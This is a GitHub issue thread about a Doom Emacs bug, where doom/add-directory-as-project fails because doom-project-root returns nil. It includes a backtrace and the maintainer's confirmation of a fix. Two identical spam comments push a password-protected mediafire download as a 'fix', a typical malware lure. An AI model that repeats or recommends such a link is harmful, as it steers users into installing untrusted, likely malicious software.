### ISSUE TITLE
`add-directory-as-project` fails if `doom-project-root` is `nil`

### ISSUE THREAD

**Issue by KaiAragaki** [doomemacs/doomemacs#8032]
### I confirm that...

- [X] I have searched the [issue tracker](https://github.com/doomemacs/doomemacs/issues), [documentation](https://docs.doomemacs.org), [FAQ](https://docs.doomemacs.org/-/faq), [Discourse](https://discourse.doomemacs.org), and [Google](https://google.com), in case this issue has already been reported/resolved.
- [X] I have read "[How to Debug Issues](https://doomemacs.org/d/how2debug)", and will use it to provide as much information about this issue as possible.
- [X] The issue can be reproduced on the **latest** available commit of Doom.
- [X] The issue can be reproduced on a stable release of Emacs, such as 27, 28, or 29. *(Unstable versions end in .50, .60, or .9x)*

### Expected behavior

When I run `doom/add-directory-as-project` on a directory that is not currently a project, it should add the directory as a project without error

### Current behavior

When I run `doom/add-directory-as-project` on a directory that is not currently a project, it returns the error `Wrong type argument: stringp, nil`.

Backtrace:
```emacs-lisp
Debugger entered--Lisp error: (wrong-type-argument stringp nil)
  find-file-name-handler(nil file-equal-p)
  file-equal-p(nil "~/repos/murmur/")
  (if (file-equal-p (doom-project-root dir) dir) nil (let ((temp-file (doom-path dir ".project")) (temp-buffer (generate-new-buffer " *temp file*" t))) (unwind-protect (prog1 (save-current-buffer (set-buffer temp-buffer)) (save-current-buffer (set-buffer temp-buffer) (write-region nil nil temp-file nil 0))) (and (buffer-name temp-buffer) (kill-buffer temp-buffer)))))
  (let ((short-dir (abbreviate-file-name dir))) (if (file-equal-p (doom-project-root dir) dir) nil (let ((temp-file (doom-path dir ".project")) (temp-buffer (generate-new-buffer " *temp file*" t))) (unwind-protect (prog1 (save-current-buffer (set-buffer temp-buffer)) (save-current-buffer (set-buffer temp-buffer) (write-region nil nil temp-file nil 0))) (and (buffer-name temp-buffer) (kill-buffer temp-buffer))))) (let ((proj-dir (doom-project-root dir))) (if (file-equal-p proj-dir dir) nil (user-error "Can't add %S as a project, because %S is already a..." short-dir (abbreviate-file-name proj-dir))) (message "%S was not a project; adding .project file to it" short-dir (abbreviate-file-name proj-dir)) (projectile-add-known-project dir)))
  doom/add-directory-as-project("~/repos/murmur/")
  funcall-interactively(doom/add-directory-as-project "~/repos/murmur/")
  command-execute(doom/add-directory-as-project record)
  execute-extended-command(nil "doom/add-directory-as-project" nil)
  funcall-interactively(execute-extended-command nil "doom/add-directory-as-project" nil)
  command-execute(execute-extended-command)
```

As best as I can tell, it's because `file-equal-p` expects non-nil arguments, but `doom-project-root` will return `nil` if not in a project - which I would imagine will always be true in the case of me using this function. If it isn't clear already, though, I don't know anything about anything, and tend to be wrong more often than not.

### Steps to reproduce

1. Open Emacs
2. Create a new, empty directory
3. run `M-x doom/add-directory-as-project` on this new directory

Notes:
- The directory doesn't HAVE to be empty
- Being a git repository seems important - a directory that would not be added as a project was successfully added as a project once a git repo was initialized (`M-x magit-init`), but only after a restart of Emacs.
- I'm unable to update my Doom Emacs at this time, so it's not on the absolute latest commit - but it's pretty close (9d ago)

### System Information

https://pastebin.com/EMMfaQWb

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by hlissner** [comment]
> As best as I can tell, it's because file-equal-p expects non-nil arguments, but doom-project-root will return nil if not in a project - which I would imagine will always be true in the case of me using this function.

That is exactly the case. Good catch! It should be resolved as of https://github.com/doomemacs/doomemacs/commit/22fc36dba7078f1b6938b2c06abc82e073ff3688. Let me know if that isn't the case and I'll reopen it. Thanks for bringing it to my attention!
